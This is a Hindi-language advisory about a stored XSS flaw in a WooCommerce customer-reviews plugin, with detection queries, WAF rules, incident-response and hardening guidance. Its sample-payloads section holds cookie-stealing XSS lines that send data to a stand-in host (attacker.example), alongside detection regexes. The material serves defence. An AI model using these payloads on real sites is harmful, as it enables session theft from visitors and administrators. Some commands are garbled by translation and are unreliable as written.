| प्लगइन का नाम | WooCommerce के लिए WordPress ग्राहक समीक्षाएँ |
|---|---|
| कमजोरियों का प्रकार | क्रॉस-साइट स्क्रिप्टिंग (XSS) |
| CVE संख्या | CVE-2026-1316 |
| तात्कालिकता | मध्यम |
| CVE प्रकाशन तिथि | 2026-02-16 |
| स्रोत URL | CVE-2026-1316 |
तत्काल: WooCommerce के लिए ग्राहक समीक्षाओं में अप्रमाणित संग्रहीत XSS (<= 5.97.0) — साइट मालिकों को अब क्या करना चाहिए
लेखक: हांगकांग सुरक्षा विशेषज्ञ
तारीख: 2026-02-16
WooCommerce के लिए ग्राहक समीक्षाओं में अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) की एक भेद्यता (<= 5.97.0)। व्यावहारिक जोखिम विश्लेषण, पहचान, शमन, और एक चरण-दर-चरण पुनर्प्राप्ति और सख्ती गाइड।.
कार्यकारी सारांश
16 फरवरी 2026 को एक सार्वजनिक सलाह ने WordPress प्लगइन “WooCommerce के लिए ग्राहक समीक्षाएँ” (संस्करण ≤ 5.97.0) में अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) की भेद्यता का वर्णन किया। यह समस्या media[].href पैरामीटर के अनुचित हैंडलिंग से संबंधित है और इसे CVE‑2026‑1316 (CVSS बेस स्कोर 7.1) सौंपा गया है।.
प्रमुख व्यावहारिक बिंदु:
- एक अप्रमाणित हमलावर ऐसा इनपुट सबमिट कर सकता है जो प्लगइन द्वारा स्थायी रूप से संग्रहीत हो जाता है।.
- यदि उस संग्रहीत मान को बाद में उचित एस्केपिंग के बिना प्रस्तुत किया जाता है, तो मनमाना JavaScript उस उपयोगकर्ता के ब्राउज़र के संदर्भ में निष्पादित हो सकता है जो साइट पर आया है।.
- संभावित प्रभावों में सत्र चोरी, विशेषाधिकार वृद्धि, स्थायी रीडायरेक्ट, और सामग्री इंजेक्शन शामिल हैं; पीड़ित प्रशासक या नियमित आगंतुक हो सकते हैं, इस पर निर्भर करते हुए कि पेलोड कहाँ प्रस्तुत किया गया है।.
एक आधिकारिक प्लगइन अपडेट (5.98.0) है जो इस समस्या को संबोधित करता है। जो साइटें तुरंत अपडेट नहीं कर सकतीं, उन्हें आपातकालीन शमन लागू करना चाहिए, पहचान स्विप्स करना चाहिए, और घटना प्रतिक्रिया प्रक्रियाओं का पालन करना चाहिए।.
क्या हुआ (तकनीकी सारांश)
- कमजोरी प्रकार: स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS)।.
- प्रभावित घटक: WooCommerce के लिए ग्राहक समीक्षाओं में media[].href पैरामीटर हैंडलिंग ≤ 5.97.0।.
- आवश्यक विशेषाधिकार: कोई नहीं (अप्रमाणित)।.
- सुधार जारी किया गया: 5.98.0।.
- CVE: CVE‑2026‑1316।.
सारांश में, प्लगइन समीक्षाओं के साथ मीडिया मेटाडेटा स्वीकार करता है। media[].href फ़ील्ड को संग्रहीत या आउटपुट करते समय ठीक से मान्य/स्वच्छ नहीं किया गया था। एक हमलावर स्क्रिप्ट सामग्री या एक URI इंजेक्ट कर सकता है जिसमें एक खतरनाक स्कीम (जैसे, javascript:, data:) हो। यदि मान को बाद में उचित एस्केपिंग के बिना HTML में प्रस्तुत किया जाता है, तो ब्राउज़र उस JavaScript को किसी भी आगंतुक के लिए निष्पादित कर सकता है जो प्रभावित पृष्ठ खोलता है।.
संग्रहीत XSS विशेष रूप से गंभीर है क्योंकि पेलोड स्थायी होता है और विशेषाधिकार प्राप्त उपयोगकर्ताओं (प्रशासकों) या सार्वजनिक आगंतुकों तक पहुँच सकता है, जिससे खाता समझौता और स्थायी साइट नियंत्रण सक्षम होता है।.
शोषण परिदृश्य और जोखिम मूल्यांकन
संभावित दुरुपयोग को समझना सुधार को प्राथमिकता देने में मदद करता है। एक हांगकांग सुरक्षा प्रैक्टिशनर के रूप में स्थानीय और क्षेत्रीय साइटों को सलाह देते हुए, इसे एक तत्काल परिचालन जोखिम के रूप में मानें जहाँ समीक्षा मीडिया प्रशासक संदर्भों या सार्वजनिक पृष्ठों में प्रदर्शित होते हैं।.
- आगंतुक-समर्थित उत्पाद पृष्ठ
यदि उत्पाद पृष्ठों या सार्वजनिक समीक्षा अनुभागों पर मीडिया href मान दिखाई देते हैं, तो आगंतुक ड्राइव-बाय हमलों के संपर्क में आ सकते हैं: रीडायरेक्ट, इंजेक्टेड विज्ञापन, या गलत सामग्री। एपीएसी क्षेत्र में खुदरा और ई-कॉमर्स साइटों पर अक्सर उच्च ट्रैफ़िक होता है, जिससे संपर्क बढ़ता है।. - व्यवस्थापक डैशबोर्ड / समीक्षा प्रबंधन
यदि मान wp-admin में प्रस्तुत किए जाते हैं, तो एक हमलावर व्यवस्थापकों को लक्षित कर सकता है। सफल शोषण से सत्र चोरी और पूर्ण साइट समझौता हो सकता है - सबसे बड़ा व्यावसायिक प्रभाव।. - सामाजिक इंजीनियरिंग प्लस संग्रहीत पेलोड
हमलावर संग्रहीत पेलोड को फ़िशिंग के साथ मिलाकर व्यवस्थापकों को उन पृष्ठों में लुभा सकते हैं जो दुर्भावनापूर्ण सामग्री प्रस्तुत करते हैं।. - बॉट-चालित सामूहिक इंजेक्शन
स्वचालित स्कैनर बड़ी संख्या में साइटों पर पेलोड लगा सकते हैं। संपर्क को सीमित करने के लिए बड़े पैमाने पर त्वरित शमन महत्वपूर्ण है।.
जोखिम रेटिंग: व्यवस्थापक या सार्वजनिक संदर्भों में अनएस्केप्ड मीडिया href प्रस्तुत करने वाली साइटों के लिए उच्च; जहां शमन नियंत्रण (जैसे, CSP, आउटपुट स्वच्छता) पहले से मौजूद हैं, वहां मध्यम-उच्च। सार्वजनिक CVSS 7.1 है।.
साइट मालिकों के लिए तात्कालिक कदम (0–24 घंटे)
यदि आप हांगकांग या अंतरराष्ट्रीय स्तर पर वर्डप्रेस साइटों का संचालन करते हैं, तो अभी कार्रवाई करें - विशेष रूप से ई-कॉमर्स और उच्च-ट्रैफ़िक साइटों के लिए।.
- स्थापना और संस्करण की पुष्टि करें
जांचें कि क्या प्लगइन स्थापित है और इसका संस्करण क्या है।.wp प्लगइन सूची --स्थिति=सक्रिय | grep -i ग्राहक-समिक्षाएँया wp-admin में प्लगइन्स → स्थापित प्लगइन्स की जांच करें।.
- यदि संस्करण ≤ 5.97.0 — तात्कालिक कार्रवाई
यदि आप कार्यक्षमता को तोड़े बिना सुरक्षित रूप से अपडेट कर सकते हैं, तो तुरंत 5.98.0 या बाद के संस्करण में अपडेट करें। यदि आप अपडेट नहीं कर सकते हैं, तो नीचे आपातकालीन शमन लागू करें (एंडपॉइंट्स को प्रतिबंधित करें, वर्चुअल पैचिंग, समीक्षाएँ बंद करें)।. - सार्वजनिक सबमिशन एंडपॉइंट्स को अस्थायी रूप से ब्लॉक करें
यदि प्लगइन AJAX/REST एंडपॉइंट्स को मीडिया[] एरे स्वीकार करने के लिए उजागर करता है:- वेब सर्वर (Nginx/Apache) पर एक नियम या पुनर्लेखन के साथ एंडपॉइंट को अस्वीकार या प्रतिबंधित करें।.
- एंडपॉइंट पर प्रमाणीकरण की आवश्यकता करें या अस्थायी रूप से समीक्षा सबमिशन को बंद करें।.
- वर्चुअल पैचिंग / WAF
संदिग्ध media[].href सामग्री को ब्लॉक करने के लिए नियम लागू करें - पैटर्न और उदाहरणों के लिए “आपातकालीन WAF नियम” अनुभाग देखें।. - संदिग्ध संग्रहीत पेलोड के लिए खोजें
स्क्रिप्ट टैग, जावास्क्रिप्ट:, डेटा:, और एन्कोडेड समकक्षों के लिए डेटाबेस और WP‑CLI खोजें (नीचे उदाहरण) चलाएँ। यदि पाए जाते हैं, तो साइट को संभावित रूप से समझौता किया हुआ मानें।. - व्यवस्थापक क्रेडेंशियल्स को घुमाएँ और सत्रों को अमान्य करें।
यदि शोषण का संदेह है तो प्रशासकों के लिए पासवर्ड रीसेट को मजबूर करें और सक्रिय सत्रों को रद्द करें।. - लॉग की निगरानी करें
प्लगइन एंडपॉइंट्स के लिए असामान्य POST गतिविधि के लिए वेब सर्वर और एप्लिकेशन लॉग की जांच करें।.
व्यावहारिक पहचान: संभावित संग्रहीत पेलोड खोजें।
पेलोड आमतौर पर पोस्ट, पोस्टमेटा, या प्लगइन-विशिष्ट तालिकाओं में संग्रहीत होते हैं। सामान्य मार्करों के लिए खोजें।.
उदाहरण SQL (अपने DB प्रीफिक्स के अनुसार अनुकूलित करें):
SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%' OR post_content LIKE '%javascript:%';
यदि प्लगइन कस्टम तालिकाओं का उपयोग करता है:
SELECT * FROM wp_customer_reviews_media
WHERE href LIKE '%<script%' OR href LIKE '%javascript:%' OR href LIKE '%data:%';
एन्कोडेड पेलोड के लिए खोजें:
SELECT * FROM wp_postmeta WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%<script%';
WP‑CLI केवल पढ़ने के लिए स्कैन:
wp db query "SELECT meta_id, post_id, meta_key, meta_value FROM wp_postmeta WHERE meta_value LIKE '%<script%'" --skip-column-names
यदि आप मेल खाते हैं: फोरेंसिक विश्लेषण के लिए पंक्तियों का निर्यात करें, फिर पहले एक स्टेजिंग वातावरण पर सावधानी से साफ करें। साइट को समझौता किया हुआ मानें जब तक कि यह साफ साबित न हो जाए।.
आपातकालीन WAF नियम और पैटर्न (वर्चुअल पैचिंग)
जब तत्काल अपडेट करना संभव न हो, तो WAF या वेब सर्वर नियमों के माध्यम से वर्चुअल पैचिंग सबसे तेज़ समाधान है। नीचे व्यावहारिक नियम विचार और ModSecurity-शैली के उदाहरण दिए गए हैं। इन्हें अपने वातावरण के अनुसार अनुकूलित करें; झूठे सकारात्मक से बचने के लिए परीक्षण करें।.
प्राथमिक लक्ष्य:
- मीडिया[].href में जावास्क्रिप्ट को इंजेक्ट करने का प्रयास करने वाले अनुरोधों को ब्लॉक करें।.
- संदिग्ध स्कीमों और एन्कोडेड स्क्रिप्ट पैटर्न को ब्लॉक करें।.
- अन्य को अस्वीकार करते हुए वैध छवि URL (http/https) की अनुमति दें।.
अवरोधित करने के लिए प्रमुख पैटर्न:
- <script> and encoded equivalents (<script, %3Cscript).
- href मानों में javascript: और data: योजनाएँ।.
- पैरामीटर के भीतर इवेंट हैंडलर विशेषताएँ (onclick=, onerror=, आदि)।.
- संदिग्ध base64 या एन्कोडेड पेलोड जो HTML/script में डिकोड होते हैं।.
उदाहरण ModSecurity-शैली का संकल्पना नियम:
# Block script tags and javascript: scheme in media[].href parameter
SecRule REQUEST_HEADERS:Content-Type "application/x-www-form-urlencoded" \
"chain,deny,status:403,id:100001,msg:'Block XSS attempt in media[].href - script tag or javascript scheme detected'"
SecRule ARGS_NAMES|ARGS "@rx ^media\[\d+\]\.href$" "chain"
SecRule ARGS:"media\[\d+\]\.href" "@rx (?:<script|%3Cscript|javascript:|data:|on\w+=|%3Cscript%3E)" \
"t:none,t:urlDecodeUni,log"
इंजनों के लिए सरल regex-आधारित जांच जो इसका समर्थन करते हैं:
# Deny if media[].href parameter matches suspicious patterns
/(?:javascript:|data:|<script|%3Cscript|on\w+=)/i
संचालन संबंधी नोट्स:
- जहां संभव हो, अनुमत योजनाओं (http, https, //) की श्वेतसूची बनाएं।.
- मिलान करने से पहले इनपुट को सामान्यीकृत करें (URL डिकोड + HTML एंटिटी डिकोड)।.
- समीक्षा अंत बिंदुओं के लिए पुनरावृत्त POSTs की दर-सीमा और फिंगरप्रिंट करें।.
उदाहरण दुर्भावनापूर्ण पेलोड (पता लगाने और हस्ताक्षरों के लिए)
इन उदाहरणों का उपयोग पहचान हस्ताक्षरों को बनाने के लिए करें। हमलावर पेलोड को सरल जांचों से बचने के लिए बदलते हैं।.
- साधारण JS URI:
जावास्क्रिप्ट: - स्क्रिप्ट टैग:
<script>fetch('https://attacker.example/steal?c='+document.cookie)</script> - इवेंट हैंडलर इंजेक्शन:
" onerror="this.src='https://attacker.example/pixel.png'; fetch('https://attacker.example/steal?c='+document.cookie) - एन्कोडेड विविधताएँ:
%3Cscript%3E%3C%2Fscript%3E,javascript%3A - डेटा: URI जिसमें एम्बेडेड स्क्रिप्ट है:
डेटा:text/html;base64,PHNjcmlwdD5hbGVydCgyKTwvc2NyaXB0Pg==
डिटेक्शन को ट्यून करते समय, पैटर्न चेक लागू करने से पहले URL-डिकोड और HTML-एंटिटी-डिकोड मान करें।.
दीर्घकालिक सुधार और हार्डनिंग (पैच के बाद)
- प्लगइन को अपडेट करें
निश्चित समाधान यह है कि ग्राहक समीक्षाओं को WooCommerce के संस्करण 5.98.0 या बाद में अपडेट करें जब परीक्षण अनुमति दे।. - इनपुट को साफ करें और आउटपुट को एस्केप करें
डेवलपर्स को URL फ़ील्ड को मान्य करना चाहिए ताकि केवल सुरक्षित स्कीम (http, https) की अनुमति हो और संदर्भ के अनुसार उचित एस्केपिंग फ़ंक्शन (esc_url(), esc_attr(), esc_html(), wp_kses()) का उपयोग करें।. - क्षमता जांच और नॉनस को लागू करें
स्थायी डेटा स्वीकार करने वाले एंडपॉइंट्स को CSRF सुरक्षा या उचित पहुंच प्रतिबंध होना चाहिए।. - सामग्री सुरक्षा नीति (CSP)
XSS प्रभाव को कम करने के लिए एक प्रतिबंधात्मक CSP लागू करें, जिससे अनुमत स्क्रिप्ट स्रोतों को सीमित किया जा सके और जहां संभव हो, इनलाइन स्क्रिप्ट को ब्लॉक किया जा सके। उदाहरण हेडर:कंटेंट-सेक्योरिटी-नीति: डिफ़ॉल्ट-स्रोत 'स्वयं' https:; स्क्रिप्ट-स्रोत 'स्वयं' https://trusted-cdn.example; ऑब्जेक्ट-स्रोत 'कोई नहीं'; बेस-यूआरआई 'स्वयं'; फॉर्म-एक्शन 'स्वयं'; - कुकीज़ और सत्रों को मजबूत करें
सुनिश्चित करें कि कुकीज़ सुरक्षित, HttpOnly, और SameSite विशेषताओं का उपयोग करती हैं ताकि सत्र की चोरी को कम किया जा सके।. - समीक्षा सबमिशन क्षमताओं को सीमित करें
उपयोगकर्ता-प्रस्तुत समीक्षाओं के लिए मॉडरेशन की आवश्यकता है और wp_kses() के माध्यम से अनुमत HTML को सीमित करें।. - आवधिक स्कैनिंग और ऑडिटिंग
XSS पेलोड के लिए नियमित स्कैन शेड्यूल करें और उपयोगकर्ता-प्रस्तुत सामग्री का मैनुअल ऑडिट करें।. - लॉगिंग और अलर्टिंग
समीक्षा एंडपॉइंट्स पर POST ट्रैफ़िक में स्पाइक्स की निगरानी करें, एकल IP से बार-बार सबमिशन, और असामान्य उपयोगकर्ता एजेंट।.
घटना प्रतिक्रिया: यदि आप संग्रहीत दुर्भावनापूर्ण सामग्री का पता लगाते हैं
यदि आप दुर्भावनापूर्ण पेलोड पाते हैं या असामान्य व्यवस्थापक व्यवहार का अवलोकन करते हैं, तो एक मापी गई घटना प्रतिक्रिया प्रक्रिया का पालन करें:
- सीमित करें
आगे के इंजेक्शन को रोकने के लिए अवरोध नियम (WAF/वेब सर्वर) लागू करें और यदि आवश्यक हो तो प्रभावित प्लगइन को अक्षम करें।. - साक्ष्य को संरक्षित करें
दुर्भावनापूर्ण पेलोड वाले डेटाबेस पंक्तियों को निर्यात करें और सर्वर लॉग और परिवर्तित फ़ाइलों की प्रतियां सुरक्षित रखें।. - समाप्त करें
डेटाबेस से दुर्भावनापूर्ण मानों को हटा दें या उन्हें साफ करें। संशोधित फ़ाइलों को सत्यापित बैकअप या मूल प्लगइन स्रोतों से पुनर्स्थापित करें।. - पुनर्प्राप्त करें
वर्डप्रेस कोर, प्लगइन्स और थीम को अपडेट करें। व्यवस्थापक पासवर्ड बदलें और सक्रिय सत्रों को अमान्य करें। यदि एपीआई कुंजी उजागर हो गई है, तो उन्हें फिर से जारी करें।. - सीखे गए पाठ और मजबूत करना
समीक्षा करें कि शोषण क्यों संभव था (जैसे, खुली समीक्षा सबमिशन, मॉडरेशन की कमी) और तैनाती/परीक्षण प्रक्रियाओं को मजबूत करें।. - हितधारकों को सूचित करें
यदि ग्राहक डेटा या भुगतान प्रभावित हो सकते हैं, तो लागू प्रकटीकरण और अधिसूचना दायित्वों का पालन करें।.
यह कैसे सत्यापित करें कि आपकी साइट साफ है (व्यावहारिक चेकलिस्ट)
- प्लगइन को 5.98.0 में अपडेट करें और पुष्टि करें कि अपडेट सफलतापूर्वक पूरा हुआ।.
- डेटाबेस में <script, javascript:, data:, और समीक्षा तालिकाओं और पोस्टमेटा में एन्कोडेड समकक्षों के लिए खोजें।.
- अप्रत्याशित सामग्री के लिए व्यवस्थापक डैशबोर्ड और मॉडरेशन पृष्ठों की समीक्षा करें।.
- संदिग्ध गतिविधियों के चारों ओर समीक्षा अंत बिंदुओं पर बार-बार POST के लिए एक्सेस लॉग की जांच करें।.
- मैलवेयर स्कैनर चलाएं और प्लगइन/थीम फ़ाइलों की ताजा स्रोतों के खिलाफ तुलना करें।.
- यह सुनिश्चित करने के लिए किसी भी WAF प्रमाण-को-धारणा नियमों का परीक्षण करें कि कोई झूठे सकारात्मक सामान्य कार्यप्रवाह को बाधित न करें।.
प्लगइन और थीम डेवलपर्स के लिए मार्गदर्शन
- संदर्भ के अनुसार सभी इनपुट को मान्य और साफ करें। आने वाले डेटा पर कभी भरोसा न करें।.
- URLs के लिए: अनुमत योजनाओं तक सीमित करें और संग्रहण के लिए esc_url_raw() और रेंडरिंग के लिए esc_url() का उपयोग करें।.
- सही संदर्भ (HTML, विशेषता, JS, URL) के लिए आउटपुट को एस्केप करें।.
- अविश्वसनीय स्रोतों से कच्चा HTML संग्रहित करने से बचें। यदि आवश्यक हो, तो wp_kses() के माध्यम से अनुमत टैग सीमित करें।.
- क्षमता जांच और CSRF सुरक्षा के लिए AJAX और REST अंत बिंदुओं का ऑडिट करें।.
- एक घटना प्रतिक्रिया योजना और एक जिम्मेदार प्रकटीकरण संपर्क चैनल बनाए रखें।.
उदाहरण: व्यावहारिक WP‑CLI और SQL कमांड जिन्हें आप अभी चला सकते हैं
केवल पढ़ने के लिए जांचें:
# प्लगइन्स और संस्करणों की सूची;
हमेशा बैकअप लें और उत्पादन में DB परिवर्तनों को लागू करने से पहले स्टेजिंग पर परीक्षण करें।.
साइट मालिकों के लिए रोकथाम चेकलिस्ट (संचालनात्मक)
- वर्डप्रेस कोर, प्लगइन्स और थीम को अपडेट रखें।.
- जहां अपडेट तुरंत लागू नहीं किए जा सकते, वहां वर्चुअल पैचिंग का उपयोग करें, और सावधानीपूर्वक परीक्षण के साथ मिलाएं।.
- सार्वजनिक उपयोगकर्ता सामग्री (समीक्षाएँ, टिप्पणियाँ) के लिए मॉडरेशन की आवश्यकता है।.
- संदिग्ध POST गतिविधियों के लिए केंद्रीकृत लॉगिंग और अलर्टिंग लागू करें।.
- मजबूत प्रशासनिक पासवर्ड और दो-कारक प्रमाणीकरण का उपयोग करें।.
- बार-बार बैकअप बनाए रखें और पुनर्स्थापना प्रक्रियाओं की पुष्टि करें।.
- प्रशासक खातों की संख्या सीमित करें और न्यूनतम विशेषाधिकार लागू करें।.
परतदार दृष्टिकोण क्यों महत्वपूर्ण है
गहराई में रक्षा जोखिम को कम करती है और सुरक्षित पैचिंग के लिए समय खरीदती है। निम्नलिखित को मिलाएं:
- शोषण प्रयासों को रोकने के लिए तत्काल वर्चुअल पैचिंग या ब्लॉकिंग नियम।.
- अधिकृत सुधार लागू करने के लिए समय पर प्लगइन अपडेट।.
- भविष्य की पुनरावृत्तियों को रोकने के लिए सुरक्षित कोडिंग प्रथाएँ (मान्यता,escaping)।.
- प्रभाव को कम करने के लिए CSP, मजबूत कुकीज़, और संचालनात्मक नियंत्रण (मॉडरेशन, लॉगिंग)।.
अंतिम सिफारिशें (अभी क्या करें)
- प्लगइन संस्करण की जांच करें और जहां संभव हो तुरंत 5.98.0 पर अपडेट करें।.
- यदि आप अभी अपडेट नहीं कर सकते: मीडिया[].href के लिए लक्षित ब्लॉकिंग नियम लागू करें, या पैच होने तक सार्वजनिक समीक्षा प्रस्तुतियों को अक्षम करें।.
- पहचान प्रश्न चलाएँ और पाए गए किसी भी संग्रहीत पेलोड को साफ करें (पहले बैकअप लें)।.
- यदि समझौता होने का संदेह हो, तो प्रशासनिक क्रेडेंशियल्स को बदलें और सत्रों को अमान्य करें।.
- एक स्तरित स्थिति अपनाएँ: वर्चुअल पैचिंग + सुरक्षित कोडिंग + CSP + मजबूत कुकीज़।.